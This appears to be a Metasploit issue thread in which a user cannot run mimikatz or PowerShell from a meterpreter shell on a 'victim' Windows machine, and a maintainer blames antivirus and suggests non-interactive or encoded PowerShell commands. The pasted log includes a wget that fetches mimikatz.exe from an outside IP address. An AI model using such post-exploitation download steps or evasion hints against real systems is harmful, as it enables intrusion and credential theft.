Unable to execute any other exe after I enter shell in meterpreter sessions

[stevenfonz]

Steps to reproduce

How'd you do it?

1. After I received the meterpreter session, enter shell to obtain the shell of victim, then I try to execute any other PE such as mimikatz.exe, powershell.exe, etc. I received no output returned.
2. ...

This section should also tell us any relevant information about the environment; for example, if an exploit that used to work is failing, tell us the victim operating system and service versions.

Expected behavior

Should be able to execute the mimikatz.exe, powerhsell.exe in shell session.

What should happen?

Current behavior

meterpreter > shell Process 880 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\spee>powershell powershell Windows PowerShell Copyright (C) 2009 Microsoft Corporation. All rights reserved.

wget http://121.121.42.75:1080/mimikatz.exe ipconfig What happens instead? You might also want to check the last ~1k lines of `/opt/metasploit/apps/pro/engine/config/logs/framework.log` or `~/.msf4/logs/framework.log` for relevant stack traces ## System stuff ### Metasploit version Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install). Framework: 4.17.14-dev Console : 4.17.14-dev ### I installed Metasploit with: - [ ] Kali package via apt ### OS What OS are you running Metasploit on? Kali Linux

[fsacer]

Sounds like AV detected your payload which is not a framework issue. Running interactive commands via shell also won't work well as shell isn't meant for that. To execute powershell commands you should consider the powershell extension or just executing powershell in noninteractive way ie. powershell -command or powershell -encodedcommand